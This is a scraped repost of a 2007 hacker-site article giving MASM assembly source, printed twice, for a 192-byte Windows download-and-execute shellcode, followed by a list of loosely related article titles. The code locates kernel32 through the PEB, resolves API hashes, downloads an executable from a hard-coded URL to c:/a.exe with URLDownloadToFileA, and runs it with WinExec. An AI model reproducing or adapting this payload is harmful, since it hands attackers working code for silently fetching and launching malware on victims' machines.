Tiny Download&&Exec ShellCode
来源:互联网 发布:js获取textarea的内容 编辑:程序博客网 时间:2024/06/04 18:48
Author: czy
http://www.ph4nt0m.org
Date:2007-06-22
;Tiny Download&&Exec ShellCode codz czy 2007.6.1
;header 163=61(16+8+9+(28))+95(68+27)+17
;163+19=192
comment %
#--------------------------------------# #
# Tiny Download&&Exec ShellCode--> # #
# -->size 192 # #
# 2007.06.01 #
# codz: czy # #
#------------------------------------------# #
system :test on ie6+XPSP2/2003SP2/2kSP4
%
.586
.model flat,stdcall
option casemap:none
include c:/masm32/include/windows.inc
include c:/masm32/include/kernel32.inc
includelib c:/masm32/lib/kernel32.lib
include c:/masm32/include/user32.inc
includelib c:/masm32/lib/user32.lib
.data
shelldatabuffer db 1024 dup(0)
shellcodebuffer db 2046 dup(0)
downshell db 'down exploit',0
txtname db 'c:/office/unicode.doc',0
.code
start:
invoke MessageBoxA,0,offset downshell,offset downshell,1
invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256
mov eax,offset shellcodebuffer
jmp eax
somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
;上面的代码是把在代码段中的shellcode移动数据段中执行,模拟真实的shellcode执行环境
@@shellcodebegin:
call @@beginaddr
@@beginaddr:
PUSH 03H ;要调用的API函数个数
jmp @@realshellcode
myExitProcess dd 073e2d87eh
myWinExec dd 00e8afe98h
myLoadLibraryA dd 0ec0e4e8eh
dll db 'URLMON',0,0
myUrlDownFile dd 0702f1a36h
path db 'c:/a.exe',0
url db 'http://www.masm32.net/a.exe',0
@@realshellcode:
POP ECX
POP EDI
SCASD ;edi+4
;得到kernel32.dll基地址
db 67h,64h,0A1h,30h,00h
mov eax, [eax+0cH]
mov esi, [eax+1cH]
lodsd
mov ebp, [eax+08H] ;EBP中存放kernel32.dll的基地址
;处理导出表
@@next2:
PUSH ECX
@@next3:
MOV ESI,[EBP+3Ch]
MOV ESI,[EBP+ESI+78h]
ADD ESI,EBP
PUSH ESI
MOV ESI,[ESI+20h]
ADD ESI,EBP
XOR ECX,ECX
DEC ECX
@@next:
INC ECX
LODSD
ADD EAX,EBP
XOR EBX,EBX
@@again:
MOVSX EDX,BYTE PTR [EAX]
CMP DL,DH
JZ @@end
ROR EBX,0Dh
ADD EBX,EDX
INC EAX
JMP @@again
@@end:
CMP EBX,[EDI]
JNZ @@next
POP ESI
MOV EBX,[ESI+24h]
ADD EBX,EBP
MOV CX,WORD PTR [ECX*2+EBX]
MOV EBX,[ESI+1Ch]
ADD EBX,EBP
MOV EAX,[ECX*4+EBX]
ADD EAX,EBP
STOSD
POP ECX
loop @@next2
mov ecx,[edi] ;2
cmp cl,'c' ;3
jz @@downfile ;2
PUSH EDI
CALL EAX ;2
xchg eax,ebp
scasd
scasd
push 01 ;2第二个DLL的函数个数
jmp @@next3 ;2
;总计17
@@downfile:
push edx ;0
push edx ;0
push edi ;file=c:/a.exe
lea ecx, dword ptr [edi+9h]
push ecx ;url
push edx ;0
call eax ;URLDownloadToFileA,0,url,file=c:/a.exe,0,0
push 1 ;FOR TEST
push edi
call dword ptr [edi-14H] ;winexec,'c:/xxx.exe',1
call dword ptr [edi-18H] ;Exitprocess
somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
invoke ExitProcess,0
end start
;header 163=61(16+8+9+(28))+95(68+27)+17
;163+19=192
comment %
#--------------------------------------# #
# Tiny Download&&Exec ShellCode--> # #
# -->size 192 # #
# 2007.06.01 #
# codz: czy # #
#------------------------------------------# #
system :test on ie6+XPSP2/2003SP2/2kSP4
%
.586
.model flat,stdcall
option casemap:none
include c:/masm32/include/windows.inc
include c:/masm32/include/kernel32.inc
includelib c:/masm32/lib/kernel32.lib
include c:/masm32/include/user32.inc
includelib c:/masm32/lib/user32.lib
.data
shelldatabuffer db 1024 dup(0)
shellcodebuffer db 2046 dup(0)
downshell db 'down exploit',0
txtname db 'c:/office/unicode.doc',0
.code
start:
invoke MessageBoxA,0,offset downshell,offset downshell,1
invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256
mov eax,offset shellcodebuffer
jmp eax
somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
;上面的代码是把在代码段中的shellcode移动数据段中执行,模拟真实的shellcode执行环境
@@shellcodebegin:
call @@beginaddr
@@beginaddr:
PUSH 03H ;要调用的API函数个数
jmp @@realshellcode
myExitProcess dd 073e2d87eh
myWinExec dd 00e8afe98h
myLoadLibraryA dd 0ec0e4e8eh
dll db 'URLMON',0,0
myUrlDownFile dd 0702f1a36h
path db 'c:/a.exe',0
url db 'http://www.masm32.net/a.exe',0
@@realshellcode:
POP ECX
POP EDI
SCASD ;edi+4
;得到kernel32.dll基地址
db 67h,64h,0A1h,30h,00h
mov eax, [eax+0cH]
mov esi, [eax+1cH]
lodsd
mov ebp, [eax+08H] ;EBP中存放kernel32.dll的基地址
;处理导出表
@@next2:
PUSH ECX
@@next3:
MOV ESI,[EBP+3Ch]
MOV ESI,[EBP+ESI+78h]
ADD ESI,EBP
PUSH ESI
MOV ESI,[ESI+20h]
ADD ESI,EBP
XOR ECX,ECX
DEC ECX
@@next:
INC ECX
LODSD
ADD EAX,EBP
XOR EBX,EBX
@@again:
MOVSX EDX,BYTE PTR [EAX]
CMP DL,DH
JZ @@end
ROR EBX,0Dh
ADD EBX,EDX
INC EAX
JMP @@again
@@end:
CMP EBX,[EDI]
JNZ @@next
POP ESI
MOV EBX,[ESI+24h]
ADD EBX,EBP
MOV CX,WORD PTR [ECX*2+EBX]
MOV EBX,[ESI+1Ch]
ADD EBX,EBP
MOV EAX,[ECX*4+EBX]
ADD EAX,EBP
STOSD
POP ECX
loop @@next2
mov ecx,[edi] ;2
cmp cl,'c' ;3
jz @@downfile ;2
PUSH EDI
CALL EAX ;2
xchg eax,ebp
scasd
scasd
push 01 ;2第二个DLL的函数个数
jmp @@next3 ;2
;总计17
@@downfile:
push edx ;0
push edx ;0
push edi ;file=c:/a.exe
lea ecx, dword ptr [edi+9h]
push ecx ;url
push edx ;0
call eax ;URLDownloadToFileA,0,url,file=c:/a.exe,0,0
push 1 ;FOR TEST
push edi
call dword ptr [edi-14H] ;winexec,'c:/xxx.exe',1
call dword ptr [edi-18H] ;Exitprocess
somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
invoke ExitProcess,0
end start
- Tiny Download&&Exec ShellCode
- DNS Reverse Download and Exec Shellcode
- Multithread download tool for massive tiny files.
- ms06040 download and reverse shellcode mika修改版
- linux exec /bin/sh shellcode x86 and x86_64
- shellcode
- Shellcode
- Shellcode
- shellcode
- shellcode
- shellcode
- Shellcode
- shellcode
- shellcode
- Shellcode
- Shellcode
- shellcode
- shellcode
- C++中的引用
- asp.net 路径问题
- asp.net 利用js 脚本 交互前后台
- Nutch 笔记(二):Craw more urls and Recrawl(收藏)
- JS常用正则表达式
- Tiny Download&&Exec ShellCode
- ANSI/ISO C++ Professional Programmer's Handbook 4
- 单击按钮或执行一些其他操作会导致回发
- Nutch研究系列1——安装(收藏)
- 爱似神仙 碧娜
- 盘口技术大全(一): 看盘要诀
- Get还是Post
- SQL Server触发器在保持数据库完整性中的应用
- 用可变参数宏(variadic macros)传递可变参数表